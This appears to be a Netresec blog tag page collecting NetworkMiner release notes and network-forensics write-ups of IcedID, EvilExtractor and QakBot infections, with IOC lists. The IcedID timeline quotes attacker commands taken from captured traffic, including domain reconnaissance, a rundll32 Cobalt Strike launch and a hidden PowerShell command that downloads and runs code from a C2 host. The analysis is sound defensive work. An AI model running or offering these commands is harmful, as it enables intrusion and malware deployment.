NETRESEC Network Security Blog - Tag : NetworkMiner

rss Google News

Remote Sniffing from Mikrotik Routers

One of the new features in NetworkMiner 2.9 is a TZSP streaming server. It is designed to read a real-time stream of sniffed packets from Mikrotik routers. This method for remote sniffing can be used to capture packets regardless if NetworkMiner is running in Windows or Linux.

Sniff Packets with Mikrotik TZSP to NetworkMiner

How to Sniff Packets with TZSP

Open a console or terminal on the Mikrotik router and run “/tool sniffer print” to see the current settings. Then run the following commands to configure the sniffer:

  • /tool sniffer
  • set streaming-enabled=yes
  • set streaming-server=10.1.2.3:37008
  • set filter-stream=yes

Replace 10.1.2.3 with the IP address of the computer running NetworkMiner

It is also possible to activate the sniffer from the RouterOS WebFig interface.

  • Expand the “Tools” section
  • Click “Packet Sniffer”
  • Check “Streaming Enabled”
  • Enter IP of computer running NetworkMiner in Server
  • Enter 37008 as Port
  • Check “Filter Stream”
  • Click the “Apply” button at the top
Mikrotik WebFig Packet Sniffer settings

The “filter-stream” setting prevents the sniffer from capturing packets that are sent to the streaming-server (i.e. NetworkMiner). This setting must be enabled to avoid a snowball effect, where copies of previously captured packets get sniffed and re-transmitted to the streaming-server.

The next step is to open the TZSP window in NetworkMiner, which you’ll find under “File, Receive TZSP Stream”.

NetworkMiner TZSP Sniffer

Click “Start” in NetworkMiner’s TZSP window, so that it listens for an incoming TZSP stream on UDP port 57008. Go back to the Mikrotik router, where you start the sniffer with “/tool sniffer start” or by clicking the “Start” button in the WebFig. You should now see the Frames counter increasing in NetworkMiner's TZSP window. You’ll probably also notice that artifacts get added to the main NetworkMiner window in the background as more packets are received.

Close the sniffer by running “/tool sniffer stop” or clicking the “Stop” button in WebFig, then click “Stop” in NetworkMiner. You can now close NetworkMiner’s TZSP window to view the artifacts that NeworkMiner has extracted from the captured traffic.

Posted by Erik Hjelmvik on Thursday, 30 May 2024 13:05:00 (UTC/GMT)

Tags: #TZSP#NetworkMiner#sniffer

Short URL: https://netresec.com/?b=2459ed5


NetworkMiner 2.9 Released

NetworkMiner 2.9

NetworkMiner 2.9 brings several new and improved features to help analysts make sense of network traffic from malware, criminals and industrial control systems. Highlights from this new version include:

  • TZSP support
  • StealC extractor
  • Improved Modbus parser
  • JA4 support
  • GTP decapsulation

Malware Traffic Artifact Extraction

NetworkMiner is a popular tool for extracting artifacts from malware traffic. Such artifacts can be downloaded malware modules, exfiltrated documents and sometimes even screenshots of the infected computer.

Parsers for njRAT and BackConnect (à la IcedID, QakBot and Bazar) traffic was previously added to NetworkMiner. In this release NetworkMiner also gets a parser for StealC, which has quickly become one of the most popular information stealers on Russian-speaking underground forums. The new NetworkMiner 2.9 release extracts screenshots and files that SteakC exfiltrates from the infected machine.

The examples shown below were created by loading a pcap file with StealC traffic from Triage sandbox into NetworkMiner 2.9. NetworkMiner was run in Linux to minimize the risk of accidentally infecting the analysis environment.

Files exfiltrated by StealC

Image: Reassembled system info and documents exfiltrated by StealC to 185.172.128.151

Reassembled screenshot of victim’s desktop sent to StealC C2 server

Image: Reassembled screenshot of victim’s desktop sent to StealC C2 server

NetworkMiner’s VNC and BackConnect VNC parser has also been improved in this release. NetworkMiner’s keylog extraction from VNC now supports lots of keyboard layouts, including Arabic, Cyrillic, Greek, Hebrew, Kana, Korean and Thai. The handling of VNC color profiles has also been improved to convey colors more correctly in screenshots from reassembled VNC and BackConnect VNC traffic. I’d like to thank Brad Duncan and Maxime Thiebaut for their valuable input on this matter!

Another remote management tool that often is misused by hackers and criminals is Remote Manipulator System (RMS) from TektonIT. According to Cyberint’s report Legit remote admin tools turn into threat actors’ tools there are lots of Russian forum posts and even YouTube tutorials showing how to include legitimate RMS components in malware. NetworkMiner now parses RMS’s session setup, which includes information about the client computer as well as the RMS product and version. The screenshot below was created by loading a pcap file from when 3_Рахунок.pdf.exe was executed in JoeSandbox.

Information extracted from RMS traffic

Image: Information extracted from RMS traffic

The country_code number (here 223) also gets converted to a human-readable country (Switzerland) by NetworkMiner, but this country name info is only displayed in the Host Details of the client.

ICS / SCADA

NetworkMiner has supported Modbus/TCP since 2016 (when NetworkMiner 2.0 was released). This Modbus parser has now been updated to display Modbus addresses using the Modicon convention, which explicitly specifies the register type while also signalling to the user that the displayed addresses are one-indexed.

Modbus queries in NetworkMiner

The register types are displayed in parenthesis and should be interpreted as follows:

  • (0)nnnn = Coil
  • (1)nnnn = Discrete input
  • (3)nnnn = Input register
  • (4)nnnn = Holding register

NetworkMiner now also reads Modbus Device Identification messages and displays the reported device info in Host Details. This feature is very handy if you’re building an asset inventory through passive asset discovery (i.e. passively monitoring traffic to identify devices).

Modbus vendor information in NetworkMiner

NetworkMiner 2.9 also supports asset identification for ICS networks that use COTP based protocols, such as Siemens S7 protocol or IEC 61850 MMS, by parsing COTP connection request messages. The identified COTP TSAP names are displayed under Host Details.

NetworkMiner showing a WinCC client and a Siemens SIMATIC device

Image: NetworkMiner showing a WinCC client and a Siemens SIMATIC device

User Interface Improvements

TLS handshake fingerprinting with JA3 was added to NetworkMiner in 2019, but last year John Althouse announced the new JA4+ fingerprint methods. In short JA4+ is a suite of methods designed to fingerprint implementations of a specific set of protocols, including TLS, HTTP and SSH. Most of the fingerprinting methods in the JA4+ suite are patent pending except for the TLS client fingerprinting method JA4, which is an improved version of JA3. NetworkMiner now generates both JA3 and JA4 fingerprints for TLS handshakes. The results from the TLS fingerprinting can be seen in the Parameters tab as well as Host Details. In the example below we’ve loaded TLS traffic to port 8533 on 91.92.251.26 from a Remcos sample on ANY.RUN into NetworkMiner Professional (the free NetworkMiner edition doesn’t parse TLS traffic to non-standard ports).

JA4 hash t13i010400_0f2cb44170f4_5c4c70b73fa0 for Remcos C2 traffic

Image: JA4 hash t13i010400_0f2cb44170f4_5c4c70b73fa0 for Remcos C2 traffic

NetworkMiner has also been improved to extract even more information from HTTP traffic, such as JSON formatted parameters and telemetry data sent to Microsoft by their Device Metadata Retrieval Client (DMRC). We have also improved the DNS extraction, both with regards to DNS TXT labels and Additional Resource Records.

The previous Remcos screenshot displays a latency measurement (0.0935 ms), which is another new feature in this release. This latency value is an estimation of the average timespan from when the host sends a packet until it gets captured by the sniffer. NetworkMiner’s hosts list can be sorted based on the Latency value, whereby local computers and network devices are shown at the top of the list. Another way to achieve similar results is to instead sort the hosts based on “Router Hops Distance”.

NetworkMiner’s user interface has also been improved to make it easier to copy text from the Hosts and Parameters tabs with Ctrl+C or by right-clicking and selecting “Copy …”. The export-to-file function in NetworkMiner Professional now additionally includes data from the Keywords tab.

TZSP Sniffing and Decapsulation

Routers from Mikrotik have a feature called TZSP (short for TaZmen sniffer Protocol), which encapsulates captured traffic into TZSP packets and then transmits them to a streaming server. This feature is similar to PCAP-over-IP and ERSPAN, except TZSP transports the sniffed packets over UDP instead of TCP or GRE.

NetworkMiner now includes a TZSP streaming server, which can receive TZSP encapsulated traffic over a UDP socket. Click “File, Receive TZSP Stream”, select a port (default is 37008) and click “Start” to receive a real-time stream of captured packets from a Mikrotik router. We’ve also added support for TZSP link layer type (DLT_TZSP) pcap files as well as decapsulation of TZSP packets to UDP port 37008. I’d like to thank Jarmo Lahtiranta for proposing this feature!

Speaking of decapsulation – we’ve added a GTP-U parser, which enables NetworkMiner to analyze GPRS traffic from GSM, UMTS, LTE and 5G networks that is transmitted inside a GTP tunnel.

Upgrading to Version 2.9

Users who have purchased NetworkMiner Professional can download version 2.9 from our customer portal, or use the “Check for Updates” feature from NetworkMiner's Help menu. Those who instead prefer to use the free and open source version can grab the latest version of NetworkMiner from the official NetworkMiner page.

Posted by Erik Hjelmvik on Monday, 27 May 2024 09:50:00 (UTC/GMT)

Tags: #NetworkMiner#TZSP#Modbus#JA4#BackConnect#VNC#JSON

Short URL: https://netresec.com/?b=245092b


Forensic Timeline of an IcedID Infection

The BackConnect and VNC parsers that were added to NetworkMiner 2.8.1 provide a unique possibility to trace the steps of an attacker with help of captured network traffic from a hacked computer.

In this blog post I use the free and open source version of NetworkMiner to see how GzipLoader downloads IcedID, after which the attacker deploys BackConnect VNC to purchase an iPhone 14 with a stolen credit card and then drops Cobalt Strike on the victim PC.

The analyzed pcap is 2022-10-31-IcedID-with-DarkVNC-and-Cobalt-Strike-full-pcap-raw.pcap from Brad Duncan's malware-traffic-analysis.net blog.

Safety First

I ran NetworkMiner in a Windows Sandbox when analyzing this PCAP file to avoid accidentally infecting my computer with any of the malicious artifacts that NetworkMiner extracts from the network traffic.

Another safe way to analyze Windows malware is to run NetworkMiner in Linux or macOS.

14:47 GzipLoader

This infection starts with GzipLoader (aka “IcedID Downloader”) reaching out to its C2 server on vgiragdoffy[.]com (67.205.184.237:80) to download IcedID.

Cookie parameters from GzipLoader request in NetworkMiner 2.8.1
Image: Cookie parameters from GzipLoader request

The “_gat” cookie value in frame number 6 tells us that the victim machine is running a Windows 10 build 19045 (aka 22H2). The long “_u” value contains the victim’s username and hostname in hexadecimal representation and the “__io” value is the logged in user’s SID. NetworkMiner decodes these values from the GzipLoader request and displays them in the Hosts tab.

Hostname, SID, username and Windows version extracted from GzipLoader cookie by NetworkMiner 2.8.1
Image: Hostname, SID, username and Windows version extracted from GzipLoader cookie

For more info about the GzipLoader cookie, see IcedID PhotoLoader evolution by Jason Reaves and the eSentire blog post on Gootloader and IcedID.

The response for this GzipLoader request is a 550 kB file (MD5 700c602086590b05dde8df57933c7e68) with a fake gzip header. This file actually contains the IcedID DLL (Odwikp.dll) and license.dat files.

Fake gzip file containing IcedID
Image: Fake gzip file containing IcedID

14:47 IcedID

The banking trojan IcedID (aka BokBot) gets launched at 14:47:29 UTC (frame 641) after which it connects to these four IcedID servers used for payload delivery and C2:

  • ringashopsu[.]com = 137.184.208.116
  • sainforgromset[.]com = 138.68.255.102
  • yeloypod[.]hair = 94.140.114.103
  • airsaintol[.]beauty = 66.63.168.75

NetworkMiner hosts details for IcedID C2 server showing JA3S hash ec74a5c51106f0419184d0dd08fb05bc
Image: JA3S hash of C2 server

These four IcedID servers all run TLS servers with self signed certificates issued for "localhost" and doing TLS handshakes with JA3S hash ec74a5c51106f0419184d0dd08fb05bc. Both these properties can be used as filters in NetworkMiner's Hosts tab to only display the IcedID C2 servers.

Self-signed X.509 certificate issued to localhost from ringashopsu[.]com with thumbprint d14983ecbe0f97023721d0960f5dc98388809cc9
Image: Self-signed certificate from ringashopsu[.]com

14:59 BackConnect and Keyhole VNC

Shortly after the IcedID C2 traffic has been started the IcedID bot also initiates BackConnect C2 connections to 137.74.104.108 on TCP port 8080 (frame 4505 at 14:59:14 UTC).

IcedID BackConnect communication in NetworkMiner 2.8.1
Image: IcedID BackConnect communication

The BackConnect C2 server tells the bot to sleep for 60 seconds two times before launching a reverse VNC session with command 0x11 (frame 4530 at 15:01.09 UTC).

VNC desktop screenshots extracted by NetworkMiner
Image: BackConnect VNC screenshots
Screenshot of attacker’s view of victim screen (Keyhole VNC)
Image: Screenshot of attacker’s view of victim screen (Keyhole VNC)

15:06 Apple Store

Attacker’s keystrokes extracted from BackConnect VNC traffic
Image: Attacker’s keystrokes extracted from BackConnect VNC traffic

The keylog of the attacker above reveals that the attacker is typing “iphone 14 apple store buy”. The VNC graphics that NetworkMiner extracted from the PCAP file additionally reveal that this was a Google search query typed into an Edge browser.

Google search results from reverse VNC session
Image: Google search results from reverse VNC session

15:10 Credit Card payment

The attacker proceeds to the Apple Store, puts a black iPhone 14 Plus for $987.99 into the shopping cart, enters a delivery address in West Hartford (US) and then inputs credit card details for the payment.

Credit card details entered in Apple Store by attacker
Image: Credit card details entered in Apple Store by attacker

Luckily, the transaction was denied by Apple Store.

Error message from Apple Store: Your payment authorization failed
Image: Payment authorization failed

15:12 Reverse Shell

After having failed to buy an iPhone through the hacked computer the attacker instead deploys three reverse shell sessions using the BackConnect C2 channel.

Frame 143574 on 15:12:30, Frame 144299 on 15:38:22, Frame 147667 on 15:49:32

These three commands are issued in the first reverse shell session:

net group "domain admins" /dom
arp -a
dir \\172.16.0.12\c$

In the second shell session the attacker first runs these three commands:

shell net group "domain admins" /dom
net group "domain admins" /dom
nltest /domain_trusts /all_trusts

...and then starts a file manager session through the BackConnect C2 channel.

15:40 Deploy Cobalt Strike

The BackConnect file manager is used to upload a Cobalt Strike binary called P2.dll to "C:\ProgramData\" on the victim computer in frame 144535.

NetworkMiner 2.8.1 showing CobaltStrike delivered to victim through BackConnect's File Manager
Image: CobaltStrike delivered to victim through BackConnect's File Manager

The uploaded P2.dll is then executed by running this command in the reverse shell session (frame 144707):

rundll32 c:\programdata\P2.dll,DllRegisterServer

NetworkMiner extracts this uploaded DLL from the BackConnect network traffic.

Files extracted by NetworkMiner from network traffic, including Cobalt Strike P2.dll
Image: Files extracted from network traffic Details for Cobalt Strike P2.dll with MD5 hash cc69a31a067b62dda5f2076f8ee335e1
Image: Details for Cobalt Strike P2.dll

VirusTotal results 46 of 71 for P2.dll cc69a31a067b62dda5f2076f8ee335e1 As you can see in the screenshot above, the MD5 hash of P2.dll is cc69a31a067b62dda5f2076f8ee335e1. This file is flagged as malicious by most AV vendors (P2.dll on VT). However, none of them label it as Cobalt Strike. Luckily I was able to use Triage's malware config extractor to verify that this was indeed Cobalt Strike (P2.dll on tria.ge). Triage also revealed that the CobaltStrike C2 URL was
clouditsoft[.]com:8008/static-directory/mg.jpg

After the DLL gets executed the victim PC establishes Cobalt Strike beacon C2 connections to clouditsoft[.]com on port 8008 (frame 144715).

Cobalt Strike beacon sessions
Image: Cobalt Strike beacon sessions

15:41 MOAR COBALT STRIKE

The BackConnect Reverse Shell log in NetworkMiner's Parameters tab shows that the attacker also attempted to download Cobalt Strike using PowerShell at 15:41:59 UTC (frame 145176) with this command:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://clouditsoft[.]com:8008/lass'))"

IOC List

  • IP:port 67.205.184.237:80 (GzipLoader)
  • DNS vgiragdoffy[.]com (GzipLoader)
  • MD5 700c602086590b05dde8df57933c7e68 (Fake gzip file)
  • MD5 f57ab2e5e5720572d5eb19010ec8dcb4 (IcedID Odwikp.dll from fake gzip)
  • MD5 57a9d9acb389bd74a7423a16ef81ac18 (IcedID license.dat from fake gzip)
  • DNS ringashopsu[.]com (IcedID C2)
  • DNS sainforgromset[.]com (IcedID C2)
  • DNS yeloypod[.]hair (IcedID C2)
  • DNS airsaintol[.]beauty (IcedID C2)
  • IP:port 137.184.208.116:443 (IcedID C2)
  • IP:port 138.68.255.102:443(IcedID C2)
  • IP:port 94.140.114.103:443 (IcedID C2)
  • IP:port 66.63.168.7:443 (IcedID C2)
  • JA3S hash ec74a5c51106f0419184d0dd08fb05bc (IcedID C2)
  • IP:port 137.74.104.108:8080 (IcedID BackConnect C2)
  • MD5 cc69a31a067b62dda5f2076f8ee335e1 (CobaltStrike P2.dll)
  • DNS clouditsoft[.]com (CobaltStrike C2)
  • IP:port 198.44.140.67:8008 (CobaltStrike C2)

Posted by Erik Hjelmvik on Thursday, 12 October 2023 13:23:00 (UTC/GMT)

Tags: #NetworkMiner#IcedID#GzipLoader#BackConnect#VNC#CobaltStrike#Cobalt Strike#Windows Sandbox#ec74a5c51106f0419184d0dd08fb05bc#JA3S

Short URL: https://netresec.com/?b=23A4de6


NetworkMiner 2.8.1 Released

I am happy to announce the release of NetworkMiner 2.8.1 today!

NetworkMiner 2.8.1

This new release brings a VNC parser to NetworkMiner, so that screenshots, keystrokes and clipboard data can be extracted from unencrypted VNC traffic. NetworkMiner 2.8.1 additionally includes parsers for command-and-control (C2) protocols used by njRAT, IcedID, QakBot and Bazar. We have also added extraction of files sent using a HTTP PUT request, which is the rare cousin to the more common POST request. NetworkMiner’s Images tab has also been updated to enable filtering based on filename or pixel count.

VNC

NetworkMiner now supports the remote framebuffer (RFB) protocol (RFC 6143), which is the underlying protocol used in VNC software. VNC is used to remotely control another computer with help of a real-time video feed of the remote computer’s screen and the ability to control the remote desktop using a mouse and keyboard.

NetworkMiner reassembles the desktop graphics that get transferred between a VNC client and server to build a local representation of the remote desktop. Screenshots of that desktop then get extracted to disk by NetworkMiner as it gets updated. These desktop screenshots can be viewed in NetworkMiner’s Images tab. NetworkMiner also extracts keystrokes and clipboard data from the VNC traffic and displays them in the Parameters tab.

VNC keylog in NetworkMiner
Image: Keystrokes “D#L#T#thispass#” extracted from 06-vnc-Password-3.3.pcap, which is available in “vnc-pcaps.zip” from the Openwall Wiki

Limitations in VNC Extraction

Essential configuration of the VNC session is set up in the beginning of each TCP session. NetworkMiner therefore requires analyzed traffic to include this initial setup in order to successfully extract graphics from a VNC session.

Only traffic to TCP ports 5900 and 5901 will be parsed as VNC traffic by the free version of NetworkMiner. Our commercial tool NetworkMiner Professional has the ability to identify VNC traffic regardless of port number, but the free version will fail to extract screenshots from VNC traffic running on non-standard ports.

NetworkMiner’s VNC implementation is currently at an early stage, which is why it might fail to extract screenshots or other data from VNC sessions. If you encounter VNC traffic that NetworkMiner fails to parse, then we’d be very grateful if you would contact us and let us know so that we can improve NetworkMiner’s VNC extraction in future releases.

BackConnect

I have previously outlined the BackConnect protocol used by IcedID, QakBot as well as Bazar. This BackConnect protocol is used by botnet operators to remotely control a victim computer using a form of remote access trojan (RAT). This BackConnect protocol supports features such as tunneling network traffic through the victim’s computer, uploading files and the ability to control the victim’s computer using VNC.

NetworkMiner now has a parser for this BackConnect protocol, which allows analysts to see screenshots, keystrokes and file uploads from when the attacker interacts with the hacked computer. As you might have guessed, NetworkMiner’s VNC parser is reused in order to also parse reverse VNC traffic from BackConnect sessions.

I would like to thank Maxime Thiebaut for releasing his PCAPeek tool, which also reassembles reverse VNC traffic from BackConnect traffic. Maxime’s tool proved that it was possible to extract graphics from this C2 traffic, which motivated me to create a BackConnect VNC parser for NetworkMiner.

BackConnect VNC Replay

To demonstrate NetworkMiner’s reverse VNC reassembly I’d like to use the file “2023-07-26-IcedID-with-Keyhole-VNC-traffic.pcap” from Brad Duncan’s fantastic malware-traffic-analysis.net website. In this traffic the IcedID BackConnect C2 server listens to TCP port 443 on 165.232.175.216.

VNC screenshots extracted with NetworkMiner
Image: NetworkMiner showing thumbnails of extracted screenshots

The screenshot thumbnails from the BackConnect VNC traffic shows that the attacker opens up the Amazon website on the victim’s computer. A copy of the full 1920x1152 screenshot, which NetworkMiner extracted from the VNC traffic, can be viewed here: VNC_73F81C83_230726142247.jpg

The parameters tab in NetworkMiner additionally confirms that the attacker manually typed “amazon.com” into the hacked computer’s web browser.

Keylog of attacker typing amazon.com
Image: Keylog of attacker typing amazon.com

Limitations in BackConnect Parser

The BackConnect implementation in NetworkMiner 2.8.1 is pretty well tested and even supports the new “encrypted” version of BackConnect that IcedID has been deploying lately (we call it “BackConnect XOR”). NetworkMiner can parse the BackConnect C2 traffic as well as the traffic from modules for reverse VNC, reverse SOCKS, reverse shell and the file manager.

Unfortunately the BackConnect traffic typically runs on TCP ports like 443 or 8080, which are normally used for TLS or web proxies. The free open source version of NetworkMiner normally attempts to interpret traffic to port 443 as TLS and 8080 as HTTP proxy, even though it might be BackConnect. A hardcoded list of 32 verified BackConnect C2 servers, such as 165.232.175.216:443, 137.184.172.23:443 and 185.99.132.16:8080, has therefore been added to NetworkMiner’s source code. This enables NetworkMiner to interpret traffic to those IP:port combinations as BackConnect. Our commercial tool NetworkMiner Professional can identify protocols without relying on the port number though, this enables the “Pro” version to also parse BackConnect traffic to C2 servers that aren’t among the 32 hard coded ones in the source code.

njRAT

njRAT is an old, yet still very popular remote access trojan (RAT). It has been around for at least 10 years (since 2013) and can be used to do things like:

  • Steal credentials
  • Take screenshots of the desktop
  • Start the camera
  • Record audio with the microphone
  • Start a reverse shell
  • Upload or download files
  • Execute a file or module
  • Capture keystrokes with a keylogger
  • Create, read or delete registry keys
  • Run a command

I have been teaching students in my network forensics classes how to manually parse njRAT traffic since 2015, but from now on I’ll instead be able to tell them to load the njRAT traffic into NetworkMiner to see what the attacker did on the victim’s computer.

Victim info extracted from njRAT PCAP with NetworkMiner
Image: Information extracted from njRAT C2 traffic by NetworkMiner
Screenshot of infected computer extracted from njRAT C2 traffic
Image: Screenshot of infected computer extracted from njRAT C2 traffic

The NetworkMiner parameters and victim PC screenshot above were extracted from 2015-04-22_capture-win4.pcap in StratosphereIPS’ dataset CTU-Malware-Capture-Botnet-120-1. The victim PC desktop screenshot actually came out as a 51x4900 pixel image in NetworkMiner 2.8.1, so I had to manually reorganize the tiles to a 510x490 image instead. I’m planning to add an automatic retiling feature to NetworkMiner to avoid having to do this manually in the future.

Limitations in njRAT Parser

njRAT comes in many different versions, forks and flavors and the protocol even has a field delimiter sequence that can be customized for each njRAT backdoor. I can therefore not guarantee that NetworkMiner will be able to parse traffic from all njRAT sessions, but so far I’ve seen very good results – even when custom field delimiters are being used.

Nevertheless, this trojan has an abundance of features but only the most commonly used ones are implemented in NetworkMiner. More specifically NetworkMiner primarily supports extraction of screenshots, credentials, keylog data, file uploads and downloads. NetworkMiner also extracts exfiltrated metadata about the victim machine and bot, such as the hostname, operating system, logged in user, bot ID, botnet, njRAT version and njRAT install date.

Also, as previously mentioned, NetworkMiner doesn’t yet stitch together tiles of desktop screenshots correctly.

Another limitation is that an njRAT C2 server can be deployed on any TCP port, which might prevent the free version from interpreting the C2 traffic as njRAT. The free version of NetworkMiner currently tries to parse traffic to ports like 1177, 5050, 5552 and a few others as njRAT, while NetworkMiner Professional will automatically recognize the njRAT protocol regardless which port it runs on.

Bug Fixes

We’ve added support for SIP keepalive messages (RFC 5626) in NetworkMiner 2.8.1. NetworkMiner Professional would previously fail to extract VoIP calls, or text messages sent through SIP, if a keepalive packet was sent in the session prior to the call or text message. We have also fixed a bug in NetworkMiner’s CapWap parser.

Upgrading to Version 2.8.1

Users who have purchased NetworkMiner Professional can download a free update to version 2.8.1 from our customer portal, or use the “Check for Updates” feature from NetworkMiner's Help menu. Those who instead prefer to use the free and open source version can grab the latest version of NetworkMiner from the official NetworkMiner page.

Posted by Erik Hjelmvik on Monday, 02 October 2023 11:13:00 (UTC/GMT)

Tags: #NetworkMiner#VNC#BackConnect#IcedID#njRAT

Short URL: https://netresec.com/?b=23A41e6


EvilExtractor Network Forensics

I analyzed a PCAP file from a sandbox execution of the Evil Extractor stealer malware earlier today. This stealer collects credentials and files of interest from the victim’s computer and exfiltrates them to an FTP server. It is designed to autonomously collect and exfiltrate data rather than receiving commands from an operator through a command-and-control channel. The EvilExtractor creators market this feature as a “golden bullet”.

Real hackers don’t use reverse shells right? If you have only one bullet, would you waste with reverse shell? Try Evil Extractor to have golden bullet.

I downloaded the Evil Extractor capture file from Triage to a Windows Sandbox environment, to avoid accidentally infecting my computer when extracting artifacts from the PCAP. I then opened it up in the free version of NetworkMiner.

NetworkMiner shows that after checking its public IP on ipinfo.io EvilExtractor makes an unencrypted HTTP connection to a web server on 193.42.33.232 to download KK2023.zip. This zip archive contains a file called “Lst.exe” which is used to steal browser data, cookies and credentials according to Fortinet.

EvilExtractor HTTP Downloads
Image: Files downloaded from TCP port 80

Twenty seconds later an FTP connection is established to 89.116.53.55 on TCP port 21. The username and password used to authenticate to the FTP server was “u999382941” and “Test1234”.

EvilExtractor FTP Credentials EvilExtractor FTP Requests

On the FTP server EvilExtractor creates a directory named after the country and hostname of the victim's PC, such as “(Sweden)DESKTOP-VV03LJ”, in which it creates the following three sub directories:

  • 1-Password-Cookies
  • 2-Credentials
  • 3-Files

EvilExtractor FTP exfil of cookies and credentials

After uploading browser cookies, browser history and cached passwords from Chrome, Firefox and Edge to the “1-Password-Cookies” directory EvilExtractor sends a file called “Credentials.txt” to the “2-Credentials” directory. The contents of this text file looks something like this:

Public IP: [redacted]
Location: [lat],[long]
Computer Name: [redacted]
Username: Admin
RAM: 4 GB
OS Name: Microsoft Windows 10 Pro
OS Bit: 64-bit
Keyboard Language: en-US
GPU: [redacted]
CPU: Intel [redacted]
MAC Address: [redacted]
Extracted WIFI: [redacted]

The stealer also exfiltrates files with mpeg, docx, jpeg, pptx, zip, avi and rar extensions from the victim PC to the “3-Files” directory on the FTP server. The directory structure of the victim’s PC is maintained on the FTP server, so that files from the victim's desktop end up in a folder called “Desktop” on the FTP server.

EvilExtractor FTP exfil of files

The stealer later downloaded a keylogger module (Confirm.zip) and a webcam module (MnMs.zip), but no additional data was exfiltrated from this particular victim PC after that point.

IOC List

  • Web server: 193.42.33.232:80
  • FTP server: 89.116.53.55:21
  • EvilExtractor: 9650ac3a9de8d51fddab092c7956bdae
  • KK2023.zip: f07b919ff71fb33ee0f77e9e02c5445b
  • Lst.exe: 163d4e2d75f8ce6c838bab888bf9629c
  • Confirm.zip: 30532a6121cb33afc04eea2b8dcea461
  • Confirm.exe: 0c18c4669e7ca7e4d21974ddcd24fdca
  • MnMs.zip: bda0bda512d3e2a81fc9e4cf393091eb
  • MnMs.exe: fb970c4367609860c2e5b17737a9f460

Users with an account on Triage can download the analyzed PCAP file from here: https://tria.ge/230424-vv9wvsfb2v/behavioral2

Update 2023-04-27

Jane tweeted a link to an execution of this same sample on ANY.RUN. This execution showed very similar results as the one on Triage, but with an interesting twist. Not only did the ANY.RUN execution exfiltrate images and documents from the Desktop and Downloads folders, it also exfiltrated “vv9wvsfb2v_pw_infected.zip”, which contained the EvilExtractor EXE file that was being run!

EvilExtractor FTP exfil of files

The PCAP from the ANY.RUN execution can be downloaded from here: https://app.any.run/tasks/43a11a79-4d1f-406c-86d7-158efb5ede01/

Posted by Erik Hjelmvik on Wednesday, 26 April 2023 08:50:00 (UTC/GMT)

Tags: #FTP#NetworkMiner#Sandbox#Triage#ANY.RUN

Short URL: https://netresec.com/?b=2342891


QakBot C2 Traffic

In this video I analyze network traffic from a QakBot (QBot) infection in order to identify the Command-and-Control (C2) traffic. The analyzed PCAP file is from malware-traffic-analysis.net.

IOC List

  • C2 IP and port: 80.47.61.240:2222
  • C2 IP and port: 185.80.53.210:443
  • QakBot proxy IP and port: 23.111.114.52:65400
  • JA3: 72a589da586844d7f0818ce684948eea
  • JA3S: ec74a5c51106f0419184d0dd08fb05bc
  • JA3S: fd4bc6cea4877646ccd62f0792ec0b62
  • meieou.info X.509 cert hash: 9de2a1c39fbe1952221c4b78b8d21dc3afe53a3e
  • meieou.info X.509 cert Subject OU: Hoahud Duhcuv Dampvafrog
  • meieou.info X.509 cert Issuer O: Qdf Wah Uotvzke LLC.
  • gifts.com X.509 cert hash: 0c7a37f55a0b0961c96412562dd0cf0b0b867d37
  • HTML Body Hash: 22e5446e82b3e46da34b5ebce6de5751664fb867
  • HTML Title: Welcome to CentOS

Links

For more analysis of QakBot network traffic, check out my Hunting for C2 Traffic video.

Posted by Erik Hjelmvik on Thursday, 02 March 2023 12:43:00 (UTC/GMT)

Tags: #QakBot#QBot#C2#Video#malware-traffic-analysis.net#ThreatFox#ec74a5c51106f0419184d0dd08fb05bc#fd4bc6cea4877646ccd62f0792ec0b62#CapLoader#NetworkMiner

Short URL: https://netresec.com/?b=233eaa1


IEC-104 File Transfer Extraction

Did you know that the SCADA protocol IEC 60870-5-104 (IEC-104) can be used to transfer files? This file transfer feature is primarily used for retrieving disturbance data from electric grid protection devices, such as protective relays, but can in practice be used to transfer any type of data.

In this video I demonstrate how IEC-104 file transfers can be extracted from network traffic with NetworkMiner.

The network traffic that was captured with NetworkMiner in this video can be downloaded here: NM_2022-12-13T14-16-00.pcap

The IEC-104 software used in the video was the IEC 104 RTU Server Simulator and IEC 104 Client Simulator from FreyrSCADA.

Posted by Erik Hjelmvik on Monday, 09 January 2023 09:00:00 (UTC/GMT)

Tags: #IEC-104#SCADA#NetworkMiner#ICS#PCAP

Short URL: https://netresec.com/?b=231efae


NetworkMiner 2.8 Released

NetworkMiner 2.8

I am happy to announce the release of NetworkMiner 2.8 today! This new version comes with an improved user interface, better parsing of IEC-104 traffic and decapsulation of CAPWAP traffic. The professional edition of NetworkMiner additionally adds port-independent detection of SMTP and SOCKS traffic, which enables extraction of emails and tunneled traffic even when non-standard ports are used.

User Interface Improvements

The first thing you see when starting NetworkMiner is the Hosts tab, which now has been updated to include a filter text box. This text box can be used to filter the displayed hosts based on the property fields they contain. By entering “Android” into the filter box NetworkMiner will show only the hosts having a property containing the string “Android”, for example in the OS classification or User-Agent string. Other properties you might find useful to filter on are hostname, JA3 hash and MAC address. If you’re running NetworkMiner Professional then you’ll also be able to filter on Country thanks to the MaxMind GeoLite2 feature included in the Pro edition.

NetworkMiner with Hosts filter Android

It’s now also possible to copy text from most tabs in NetworkMiner with Ctrl+C or by right-clicking and selecting “Copy selected rows”. A maximum of 10 rows can be copied at a time using the free version of NetworkMiner, while the Professional version allows all rows to be copied in one go.

The content based file type identification introduced in NetworkMiner 2.7 has been improved to also differentiate between EXE and DLL files as of version 2.8.

Matanbuchus malware download in NetworkMiner
Malicious AutoIt binary extracted from network traffic by NetworkMiner

IEC 60870-5-104

NetworkMiner’s parser for the SCADA protocol IEC 60870-5-104 (IEC-104) has been significantly improved in version 2.8. NetworkMiner now supports more IEC-104 commands and the commands are presented on the Parameters tab in a clearer way than before.

IEC-104 traffic in NetworkMiner

Image: IEC-104 commands sent by the Industroyer2 malware

I’m also proud to announce that NetworkMiner 2.8 now extracts files transferred over the IEC-104 protocol. More details about that particular feature is available in our IEC-104 File Transfer Extraction blog post.

CAPWAP Decapsulation

NetworkMiner 2.8 can read IEEE 802.11 packets inside CAPWAP tunnels between WLAN Controllers and Access Points. This feature allows WiFi traffic to be analyzed without having to capture packets in the air.

Reading PCAP from a Named Pipe

NetworkMiner previously allowed packets to be read from PacketCache over a named pipe. This feature has been upgraded to allow a PCAP stream to be read from any named pipe, not just from PacketCache. Here’s an example showing how to capture packets from localhost for 10 seconds with RawCap and make those packets available via a named pipe called “RawCap”:

